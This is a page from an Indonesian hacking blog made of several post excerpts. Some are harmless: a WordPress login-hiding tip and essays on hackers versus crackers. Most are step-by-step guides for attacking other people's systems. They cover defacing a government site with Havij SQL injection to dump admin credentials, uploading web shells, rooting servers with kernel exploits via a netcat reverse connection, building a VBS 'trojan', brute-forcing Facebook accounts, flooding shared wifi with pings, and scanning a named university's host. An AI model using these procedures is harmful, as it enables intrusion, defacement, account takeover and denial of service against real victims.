Cara Deface Website Dengan Menggunakan Tools Havij

Download Tools :
 Havij Version 1.15 Free | 2.75 MB

Installation Setup Download Tools Havijnya Lalu Install Filenya Kemudian Double Klik Icon Havijnya Selesai.

1). Kalo Tools Havijnya sudah terinstal, buka tools tersebut dengan cara double click.

2). Nah, sekarang kita cari targetnya. Karena saya belum sempat share Dorknya, Jadi sobat bisa cari Dorknya di Google, Banyak kok :D

3). Jika target sudah dapat, saya ambil contoh http://www.tested.go.id/index.php?q=hotspot&hid=2054

4). Kita masukkan target tersebut kedalam kolom target No 1, terus liat dilangkah No 2, terlihatkan nama databasenya, kemudian kalo udah berhasil klik table yang sudah saya tandai dengan nomer No 3.

5). Kalo sudah sobat klik, maka tampilannya akan seperti dibawah ini. Lalu kalo sudah, sobat klik lagi Get Tables, liat nih gambar dibawah.

6). Akan ada banyak sekali table-table yang terbuka. Terus ayo kita tebak dimana letak admin & passwordnya berada. Saya menebak kalo user dan passwordnya ada ditable web_users. Okelah, kita coba table tersebut, kita liat isinya dengan hanya mengklik GetColoums yang terletak disebelah Get Tables yang saya tandai degan No 2.

7). Selanjutnya tinggal sobat centang data yang ingin sobat ambil. Saya tandai dengan No 1, lalu klik Get Data, Kemudian kita lihat apa yang terjadi.

8). Ayeee, keliatankan user sama passwordnya, tapi masih terenkripsi dengan MD5. Cara mengenkripsinya mudah kok, karena tools ini juga menyediakan enkripsi untuk MD5.

9). Yang paling penting sobat tinggal mencari halaman login adminnya, Sobat hanya perlu mengklik Icon yang berjudul Find Admin, kemudian tunggu hingga muncul tulisan I'm IDLE.

Read More ->>

Pengertian dan Dasar – Dasar Web Attack

Apa itu web attack?

Web attack merupakan sebuah aktivitas yang dilakukan oleh seseorang dengan memanfaatkan sebuah celah atau sisi kerentanan pada aplikasi web maupun server. Sebenarnya tidak sulit untuk melakukan seebuah aktivitas hacking, hanya saja butuh kesabaran dan kemauan yg kuat agar bisa menguasainya. Tetapi, kebanyakan lebih memilih cara2 yang instans dengan memanfaatkan tools yg lebih mudah. pada hal kalo teknik dan metode nya dipelajari tidak terlalu ribet, asalkan tau dasar dasarnya terlebih dahulu :) "Tidak perlu menjadi Hacker untuk bisa Hacking" by Onix AQua ;)

Jadi, sebelum mempelajari teknik dan metodenya, alangkah baiknya ketahui dahulu dasar dasarnya dan apa saja istilah yang sering dilakukan dalam dunia hacking khususnya web attack. Disini saya hanya ingin berbagi apa yang saya ketahui saja, tidak ada maksud untuk mengajari maupun menggurui, semoga ada manfaatnya bagi yang membutuhkan.. :)

Alur Web Attack

Ada berbagai cara yang dilakukan oleh seorang attacker untuk mencari kelemahan dan menerobos sebuah sistem keamanan agar bisa mendapatkan akses penuh terhadap website tersebut. berikut merupakan gambaran alur web attack berdasarkan apa yang saya lakukan dalam proses web attack:

Single Web Attack

Gathering Information  > Exploitation  > Upload Shell > Rooting > Deface > Archive

Dalam kasus ini sang attacker menentukan web target yang akan di serang, kemudian mencari dan mengumpulkan informasi yang berhubungan dengan website target seperti penggunaan server, aplikasi web, dll. Di sini attacker melakukan proses Scanning pada web untuk mendapatkan semua informasi yang dibutuhkan termasuk kelemahan atau celah yang bisa dimanfaatkan untuk mendapatkan hak akses penuh dalam web tersebut (Exploitation) sehingga bisa dilakukan proses penanaman shell atau backdoor (Upload Shell). Kelemahan umum yang banyak ditemukan pada aplikasi web yaitu SQL Injection, XSS, CSRF, Upload Vulnerabilities, dll. Hanya saja kelemahan yang paling riskan dan paling mudah digunakan dalam web attack yaitu dengan memanfaatkan fasilitas upload yang ada pada fitur aplikasi web sehingga dengan mudahnya attacker bias melakukan upload shell secara remote maupun direct upload.

Random Web Attack

Find Exploit > Dorking > Exploitation > Upload Shell > Symlink/Jumping > Crack Cpanel/WHM >  Rooting > Deface > Archive

Nah, teknik ini yang paling sering digunakan oleh para defacer  selain mudah dan tidak perlu susah susah menemukan celah pada web aplikasi dan bisa mendapatkan banyak korban secara random berdasarkan dork yang digunakan dalam menemukan web target . 

Read More ->>

Tutorial Menyembunyikan Admin Login di WordPress

Kabar gembira nih bagi pengguna CMS WordPress, aku ada sedikit trik nih agar website anda sedikit lebih aman, biar tidak di deface gitu :D

[+] PEMBAHASAN [+]

Biasanya kalo CMS WordPress kan login adminnya di "localhost/wp-login.php: nah di trik ini ane mau bahas gimana cara gantinya :D biar para hekel-hekel bingung nemuin admin login site anda :D

[+] LANGKAH-LANGKAH [+]

1. Masuk ke Cpanel website sobat
2. Lalu masuk ke "File Manager" di Cpanel sobat.
3. Setelah itu rename file "wp-login.php" menjadi alamat login baru sobat, misalkan menjadi "CJ.php" (*EKSTENSI WAJIB .php )
4. Setelah selesai, buka file "CJ.php" lalu ganti semua tulisan "wp-login" menjadi "CJ" setelah selesai diganti semua klik SAVE
5. Selanjutnya buka folder "wp-includes" dan cari file "general-template.php" lalu buka file general-template.php lalu renam kata "wp-login" menjadi "CJ", jika sudah klik save.

Sampe step ini website anda juga belum aman sob, dikarenakan jika kita mengakses "localhost/wp-admin" kita langsung di lempar ke halaman loginnya, nah jadi gimana cara mengatasinya ? lanjut !!!!

1. Buat file berektensi .php di public_html terserah namanya apa sebagai contoh :: garuda.php
2. Lalu file garuda.php itu saya isi kata "Are you fucking kidding me ? your IP has been Recode hacker ^_^"
3. Setelah itu buka kembali folder wp-includes lalu buka file general-template.php, lalu cari kata ini :

function wp_login_url

nanti kalian akan menemukan tulisan seperti ini ::
function wp_login_url($redirect = ‘ ‘, $force_reauth = false) {

$login_url = site_url(‘CJ.php’, ‘login’); 

4. Ganti tulisan berwarna biru "CJ.php" menjadi "garuda.php" kemudian save :D

Dan sekarang coba sobat cek alamat login sobat apa sudah terganti atau belum, jangan lupa ceklocalhost/wp-admin lihat apa yang keluar ^_^

Demikian tutorial yang bisa saya sampaikan, semoga berguna

Read More ->>

Arti/Makna dari gambar-gambar pada Lambang/Logo Cyber~Joker

-Gambar Tengkorak
Tengkorak  bermakna Organisasi Perompak/Bajak Laut, yaitu sekelompok Orangi yang menguasai daerah di lautan. dalam Cyber~Joker Tengkorak bermakna Sekelompok orang yang menguasai/mengerti tentang Hacking

-Gambar Prisai
Prisai bermakna Pelindung/Pertahanan, Yaitu sebagai prisai agar dapat menyerang serang. dalam Cyber~Joker Prisai bermakna sebagai pelindung negara Indonesia di bidang Hacking.

-Gambar Sayap
Sayap bermakna sebagai alat terbang, yaitu alat bantu terbang seekor burung, dalam Cyber~Joker Sayap bermakna sebagai alat agar Organisasi dapat setara dengan Organisasi besar seperti Indonesia Cyber Army

-Gambar Topi Pesulap
TopiPesulap berakna tempat seorang pesulap banyak mengeluarkan triknya, artinya topi pesulap juga berguna untuk sebuah trick pesulap, dalam Cyber~Joker Topi Pesulap bermakna bahwa Cyber~joker juga berguna untuk negara Indonesia

Catatan: Secara Keseluruhan Makna Lambang.logo diatas dapat disimpulkan bahwa, Cyber~Joker Merupakan Sebuah Organisasi Hacker yang bertugas untuk menjaga Pertahanan Indonesia, dan Berguna Bagi Nusa dan bangsa. yang akan berusaha agar bisa dipandang orang sebagai Organisasi yang berguna untuk Indonesia.

Read More ->>

Hack Wifi berpassword

Buka RUN lalu ketikkan cmd.exe, atau bisa juga langsung ketikkan cmd.exe pada kolom search di start menu (*bagi yang menggunakan windows 7)

Lalu Ketikan ipconfig/all di pointer yang kedip-kedip. Perintah ini berfungsi untuk menampilkan informasi seputar koneksi dimana anda berada sekarang

Hasilnya akan yang berisi segala macam informasi tentang komputer anda. Lalu cari yang namanya DNS Server kemudian lihat kode yang ada di sebelahnya, dan kode itu yang harus anda ingat, dan kalo perlu tulis dahulu di notepad

Lalu scrolling cmd.exe kalian kebagian yang paling bawah, maka kalian akan menemukan perintah seperti perintah awal untuk mengetik. Kini perintah ketikannya beda lagi. Ketikkan perintah seperti berikut ping -L 500 10.0.1.2 -t. dan kode 10.0.1.2 itu berasal dari DNS Server yang tertera di atas (*DNS Server Punya saya). Ganti dengan DNS Server kalian

Tekan Enter. Maka akan tampak proses, Biarkan proses itu berjalan terus selama kalian online menggunakan wifi dimana tempat kalian sedang nongkrong sekarang ini. Bila perlu minimize saja, asal jangan di tutup cmd.exenya

Cara ini bertujuan untuk menyedot bandwitch yang sedang digunakan oleh orang lain dalam satu jaringan hotspot/wifi yang sama-sama kalian gunakan. Jika anda kurang puas dengan kecepatannya bisa anda ganti 500 menjadi 1000 atau 2000. Tetapi saya sarankan jangan berlebihan kasihan kan orang lain,dia mau buka fb kan gak bisa apalagi dia mau update status 

Read More ->>

Tutorial Rooting Server

Bahan - Bahan :
- VPS
- Putty For Windows
- Web Yang Sudah Tertanam Shell
- Exploit Kernel Big Grin

Langkah - Langkah :



1.Backconnect dulu untuk tutor backconnect bisa di baca di Post sebelumnya

2.Setelah Di Backconnect Akan Keluar Kernelnya Lalu Kita Search google

~> Exploit Kernel [kernel web] contoh :
~> Exploit Kernel 2.6.32

3.Setelah Menemukan Upload Exploit Ke Web

4.Kita Kembali Ke putty Lagi Ganti chmodnya menjadi 777 dengan cara :
~> "chmod +x namafile"
~> "chmod 777 namafile"

5.Tinggal Kita Excute dengan cara "./namafile" Contoh "./xxx"

6.Coba Ketik id Jika Keluar
~> uid=0(root) gid=0(root) groups=0(root) Berarti Succes Jika Error Berarti Kernel Kurang Pas

Read More ->>

Tutorial Backconnect Dengan Netcat Di Putty

Backconnect Adalah Teknik Awal Untuk rooting Tapi Saya Disini Hanya Share Tutor Backconnect Untuk Rootingnya Menyusul xiixxixiix Bahan-Bahan : -VPS (Kalo Gk Punya Duit Bisa Cari Yang Trial ) -Putty (Download Disini
) -Shell Yang Sudah Tertanam Di Web Langkah-Langkah Backconnect Adalah Teknik Awal Untuk rooting Tapi Saya Disini Hanya Share Tutor Backconnect Untuk Rootingnya Menyusul xiixxixiix 

Bahan-Bahan :

-VPS (Kalo Gk Punya Duit Bisa Cari Yang Trial )
-Putty (Download http://www.putty.org/)
-Shell Yang Sudah Tertanam Di Web 

Langkah-Langkah

1).Buka Putty Lalu Masukan IP VPS Kamu Trus Klik Open

 

2).Lalu masukan User Dan Password VPS Kalo Succes Login Akan Seperti Ini 

 

3).Sekarang Kita Masukaan Command nc -lvp [port] contoh ; nc -lvp 2802 Saya Sarankan Menggunakan port 443 Lalu Tekan Enter

 

4).Lalu Kita Ke Shell Dan Masukan IP VPS Trus Port Lalu Klik Connect 

 

5).Kalo Sudah Connect Akan Seperti Ini Sekarng Terserh Mau Di Apain :v

Read More ->>

Cara Membuat Virus Trojan

1. Buka Notepad | All Program > Notepad
 2. copy Scriptnya Disini
3. Pastekan scriptnya ke NotePad
4. Kalau Sudah Simpah Filenya Dengan Extensi .VBS contoh scandinavianhacker.VBS , Nyimpennya Harus All Files
5. Jangan Di Klik kalau Itu Komputer Pribadi Gw Gak Tanggung Jawab Kalau Keluar 1000 File Aneh NB:Saya Tidak Bertanggung Jawab Atas Apa Yang Anda Lakukan Ini Hanya Materi Pembelajaran

Read More ->>

Tool Hack Akun Facebook 2013

Nih ane punya aplikasi hack facebook yg bisa sobat gunakan untuk menemukan password dari akun facebook orang lain caranya penggunaaanya sangat mudah dan simple aja kok, disarankan untuk melengkapin bahan2 yg telah dilampirkan agar aplikasi tersebut bisa berjalan dengan baik dan sebelumnya tools ini sudah ane coba, dan masih work 100%

 Bahan - Bahan:
1. Python 2.7


2. Aplikasi Hack Facebook | Download Password
 

3. Wordlist | Use your brain (pikirkan kira2 passwordnya apaan) 
4.Mechanize | Baca bagian bawah!

Langkah - Langkah:
-Download dulu bahan2 lalu install Python 2.7 nya, kemudian extract file tool hack FB nya, kalo ane di extract di partisi D:\

-Kemudian buka terminal sobat dan masuk ke directori D:\facebook

-Setelah itu jalankan toolnya dengan cara ketik facebook.py lalu enter! masukkan email/username akun facebook target lalu enter! trus masukin juga nama file password list yg isinya merupakan kumpulan dari kombinasi kata, huruf dan angka, lalu enter!

-Sekarang tinggal nunggu hasilnya, lama prosesnya tergantung dari banyaknya wordlist yg digunakan! kalo punya ane cuma 1GB, jadi sekitar beberapa menit menit aja

-Setelah menunggu beberapa saat, ketemu dah passwordnya Nah tinggal Login aja ke Facebooknya Udah yaa, Selamat mencoba aja..


Goodluck!! kalo seandainya sobat meengalami error saat menjalankan toolsnya, silahkan install Mechanize <a href="https://pypi.python.org/pypi/mechanize/" target="_blank"><b>Disini</b></a><br />

cara installnya: via terminal masuk dulu ke directori mechanize, lalu ketik perintah setup.py install lalu enter

 Note: " Semakin banyak wordlistnya semakin bagus karna cara kerja tools ini menebak password berdasarkan wordlist yg tersedia, usahakan buat wordlistnya seunik mungkin utk hasil yg lebih maksimal

Read More ->>

Basic/ Ilmu Dasar Yang Harus Dikuasai Seorang Hacker

1. Mempelajari program dan bahasa pemrograman
keahlian yang paling dasar seorang hacker adalah program. Bisa memulainya dari Python, Java, C/C++ kemudian Perl dan LISP. Menjadi hacker perlu mempelajari secara mendalam bagaimana berpikir dan memecahkan masalah pemrograman dalam berbagai bahasa pemrograman. Berlatih melalui membaca kode programdan menuliskan kode program.

2. Mempelajari software dan operating system open-source
software open-source dapat diperoleh dengan biaya yang minimal, source-code nya tersedia sehingga dapat dimodifikasi. Nilai yang diperoleh dengan mempelajari software open-source jauh lebih tinggi dari software komersial. Software komersial seperti Microsoft atau Apple didistribusikan dalam bentuk binari sehingga sulit membaca kodenya. Unix adalah operating system di internet. Bila kita berfokus pada mempelajari Unix, akan banyak sekali manfaatnya. Budaya hacker saat ini terpusat pada Unix.

3. Mempelajari penggunaan world wide web dan menulis dalam HTML
ini bukan dimaksudkan belajar menggunakan web browser, tapi belajar menulis dalam HTML (hiper-text mark-up language). Menulis dalam HTML akan melatih kebiasaan berfikir tentang pemrograman. Jadi, buatlah Home Page (dengan HTML tentunya, bukan program visual) dengan isi yang baik. Isi yang baik akan melatih semangat untuk berbagi.

4. Mempelajari dan menulis bahasa Inggris
suka atau tidak, bahasa Inggris masih merupakan bahasa yang digunakan dalam internet. Hampir dapat dikatakan tools pemrograman yang ada menggunakan bahasa Inggris. Jadi fokuskan untuk dapat menulis dalam bahasa Inggris dengan baik. Selain mempelajari keempat ilmu dasar itu, yang tidak kalah pentingnya adalah menumbuhkan sikap seorang hacker. Sama seperti keahlian lainnya, selain kemampuan, sikap dan budaya akan keahlian tersebut sangat menentukan seseorang berhasil mencapai status keahlian itu atau tidak.

Berikut hal-hal yang menjadi sikap dan kebiasaan seorang hacker :
1. Melakukan usaha keras dengan penuh memotivasi
menjadi hacker adalah menyenangkan, kesenangan yang membutuhkan usaha keras untuk mencapainya. Usaha keras tersebut harus dipelihara dengan motivasi yang tinggi untuk mendapatkan ilmu dasarnya, melatihnya dengan memecahkan masalah, dan berlatih terus menerus untuk mempertajam keahlian. Jangan membatasi diri.

2. Menjadi kreatif
tidak ada metode penyelesaian yang keramat dan jitu dalam permasalahan komputer yang terus berkembang. Memiliki kreatifitas, walaupun sumberdaya terbatas, akan sangat membantu dan bernilai tinggi.

3. Memelihara rasa ingin tahu
rasa ingin tahu akan memotivasi diri dari dalam, sehingga memiliki kemauan untuk membaca, melakukan latihan dan percobaan, mencari penyelesaian masalah hingga tuntas, dan melihat sejauh mungkin.

4. Mengatasi kejenuhan
jangan pernah bosan dan jenuh terhadap pekerjaan yang berulang-ulang, sebab hal itu merupakan salah satu bagian dari upaya penyelesaian terhadap masalah baru. Seorang hacker harus dapat mengatasi kebosanan dan kejemuan yang muncul dalam dirinya.

5. Menumbuhkan iklim yang kondusif
kreatifitas, ide cemerlang dan kejernihan berpikir biasanya muncul pada suasana yang menyenangkan. Hacker memerlukan suasana itu. Bentuk dan macam suasana yang menyenangkan sangat beragam dan tidak berlaku universal, jadi lebih mudah menset suasana itu oleh diri sendiri.

6. Membangun sikap dan kemampuan yang handal
menjadi hacker memerlukan kecerdasan, latihan, dedikasi dan kerja keras. Membangun sikap dan memiliki kemampuan sangat penting, sehingga perlu dimiliki secara bersama-sama.

7. Melakukan interaksi dalam komunitas hacker
komunitas hacker biasanya merupakan sebuah forum untuk saling berbagi pengalaman dan ilmu atau dapat juga hal-hal ringan lainnya. Saat seorang hacker dalam keadaan buntu terhadap suatu masalah, komunitasnya akan siap membantu.

Read More ->>

Pengertian Hacker

Pada awalnya sebutan hacker ditujukan kepada para programer yang ahli atau orang-orang yang mempunyai minat sangat tinggi terhadap komputer yang berkumpul dalam sebuah komunitas untuk berbagi pengalaman dan ilmu. Hacker membangun jaringan, membangun internet, membangun sistem operasi Unix, membuat Usenet, membuat World Wide Web beroperasi. Bila seseorang adalah bagian dari budaya tersebut dan memberikan kontribusi pada perkembangannya, kemudian komunitasnya mengetahui serta memanggilnya hacker, maka dia adalah seorang hacker. 

(definisi menurut Eric S. Raymond)
Ada sebuah komunitas lain yang mengaku sebagai hacker dan kemudian media massa pun menjulukinya sebagai hacker. Mereka (umumnya) adalah sekumpulan anak muda yang melakukan deface, menerobos sistem keamanan suatu institusi, mencuri password, merusak sistem, dan/atau melakukan phreaking. Hacker yang sesungguhnya menjuluki mereka cracker. Cracker biasanya tidak bertanggung jawab, kriminal dan merusak.

Definisi hacker menggelembung dan menciut, memositif dan menegatif sesuai persepsi yang dibangun oleh media massa.

Bagaimana menjadi seorang hacker ?
Sebagaimana profesi ”keahlian” lainnya, menjadi seorang hacker tentunya tidak serta merta setelah lulus sekolah komputer atau kursus pemrograman langsung dapat dikatakan hacker atau programmer. Untuk mendapatkan keahlian tersebut, walaupun tidak mesti dijuluki hacker, membutuhkan ilmu yang komprehensif menyangkut teknologi informasi dan komunikasi, serta memiliki cara berfikir hacker.

Read More ->>

Perbedaan Hacker dan Cracker

>>Hacker :
Ada beberapa jenis kegiatan hacking, diantaranya adalah: Social Hacking, yang perlu diketahui : informasi tentang system apa yang dipergunakan oleh server, siapa pemilik server, siapa Admin yang mengelola server, koneksi yang dipergunakan jenis apa lalu bagaimana server itu tersambung internet, mempergunakan koneksi siapa lalu informasi apa saja yang disediakan oleh server tersebut, apakah server tersebut juga tersambung dengan LAN di sebuah organisasi dan informasi lainnya.

Technical Hacking, merupakan tindakan teknis untuk melakukan penyusupan ke dalam system, baik dengan alat bantu (tool) atau dengan mempergunakan fasilitas system itu sendiri yang dipergunakan untuk menyerang kelemahan (lubang keamanan) yang terdapat dalam system atau service. Inti dari kegiatan ini adalah mendapatkan akses penuh kedalam system dengan cara apapun dan bagaimana pun.

Ciri-ciri hacker:
-Mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs. Sebagai contoh : jika seorang hacker mencoba menguji suatu situs dipastikan isi situs tersebut tak akan berantakan dan mengganggu yang lain. Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna. Bahkan seorang hacker akan memberikan masukan dan saran yang bisa memperbaiki kebobolan system yang ia masuki.
-Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja.
-Seorang Hacker tidak pelit membagi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.
-Seorang hacker akan selalu memperdalam ilmunya dan memperbanyak pemahaman tentang sistem operasi.

>>Cracker :
Cracker adalah seseorang yang berusaha untuk menembus sistem komputer orang lain atau menerobos sistem keamanan komputer orang lain untuk mengeruk keuntungan atau melakukan tindak kejahatan.
Inilah yang membedakannya dengan hacker.

Ciri-ciri Hacker:
-Mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan. Sebagai
contoh : Virus, Pencurian Kartu Kredit, Kode Warez, Pembobolan Rekening Bank, Pencurian Password E-mail/Web Server.
-Bisa berdiri sendiri atau berkelompok dalam bertindak.
-Mempunyai website atau channel dalam IRC yang tersembunyi,
hanya orang-orang tertentu yang bisa mengaksesnya.
-Mempunyai IP address yang tidak bisa dilacak.
-Kasus yang paling sering ialah Carding yaitu Pencurian Kartu
Kredit, kemudian pembobolan situs dan mengubah segala isinya menjadi berantakan. Sebagai contoh : Yahoo! pernah mengalami kejadian seperti ini sehingga tidak bisa diakses dalam waktu yang lama, kasus klikBCA.com yang paling hangat dibicarakan beberapa waktu yang lalu.

Kesimpulan:
-Hacker yang ‘baik’ adalah orang yang mengetahui apa yang
dilakukannya, menyadari seluruh akibat dari apa yang
dilakukannya, dan bertanggung jawab atas apa yang dilakukannya.
-Hacker yang ‘jahat’ atau biasa disebut cracker adalah orang yang tahu apa yang dikerjakannya, tetapi seringkali tidak menyadari akibat dari perbuatannya. Dan ia tidak mau bertanggung jawab atas apa yang telah diketahui dan dilakukannya itu. Karena hacker adalah orang yang tahu dalam ketahuannya, di dunia hackers tentu saja ada etika yang mesti dipenuhi dan dipatuhi bersama.
Lebih jauh lagi tentang Cracker,
-Prinsip kerja hacker dan cracker sebenarnya sama. Yang membedakan keduanya adalah tujuannya. Dari segi kemampuan, cracker dan hacker juga tidak jauh berbeda.
Tapi cracker seringkali memiliki ilmu yang lebih oke dan keberanian serta kenekatan yang lebih besar daripada hacker.

Read More ->>

Metode Penetrasi

Dalam mempelajari hacking tingkat dasar adalah yang terpenting pertama adalah harus dapat menyamarkan jejak dan kedua mengetahui metode penetrasi yaitu mengetahui celah lubang yang dibuka oleh host target. Entah itu dalam internet atau dalam jaringan lokal. Disini yang dibahas melakukan penetrasi saja dilain kesempatan mungkin kita bahas metode yang lainnya. Dalam melakukan penetrasi adalah dasar basic hacking dimana dapat mengetahui celah dan vulnerabilities di host tersebut. Untuk memahami lebih lanjut tentang hal tersebut anda bisa memperdalam daftar port dan TCP/IP. Dalam melakukan penetrasi dengan menggunakan GFI-Languard dimana bisa diupdate database vulnerabilities dan banyak fasilitas yang lainnya.GFI-Landguard bisa di download Disini

Mari kita coba melakukan penetrasi suatu host/server contoh target stiki.ac.id kita bisa mengetahui port/lubang apa saja yang bisa kita masuki dan vulnerability apa saja dihost tersebut.

 

Disitu terlihat IP public yang dipake adalah 203.134.237.242, vulnerabilities ada 3 dan port yang terbuka ada 3 yaitu 53 (dns) - 80 (web) - 443 (ssl) dmana ketiga port yang terbuka tersebut dapet kita tembus dengan metode exploit dan buffer overflow.Untuk Vulneribility ada 3 yaitu di RPC untuk High security. Untuk jaringan lokal mari kita coba lakukan penetrasi jangan lupa kita harus mengetahui IP address n subnet kita jadi kita bisa mengetahui range dalam satu sub network.untuk mengetahui IP kita masuk start-_ run-_ketik cmd-_ketik ipconfig.

 

Kita mengetahui IP kita 192.168.2.2 mempunyai subnet 255.255.255.240 berarti dimana dalam satu sub network ada sebanyak 14 host.Kita bisa mengetahui IP berapa saja yang hidup dan apa saja yang kita bisa masuk kedalam host target. Terkadang GFI-Languard bisa memberikan hak akses langsung kedalam target dengan kita mengklik vulneribilitas host tersebut. Di GFI-Lan Guard kita ctrl-n scan type kita pilih range of computers.



Disitu terlihat ada 2 host yang hidup sekarang bagaimana kita berkreasi dengan host yang hidup tersebut.

 

Dengan informasi diatas kita bisa mengetahui vulneribilites, patching, port yang terbuka, nama host dan bisa memakai mac addressnya untuk membuat cloning dengan host tersebut. Ok selamat mencoba dan berkreasi.

Read More ->>